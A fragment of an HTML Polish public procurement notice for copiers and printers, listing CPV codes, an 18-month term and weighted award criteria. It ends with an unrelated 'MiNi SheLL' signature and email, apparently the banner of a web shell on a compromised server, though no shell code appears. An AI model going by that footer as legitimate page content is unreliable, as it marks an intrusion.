<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.11.00-4, 30.12.51.20-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Funkcjonalność i ergonomia - 20</li>
<li>3. Jakość wydruków, skanów oraz kopii - 10</li>
<li>4. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com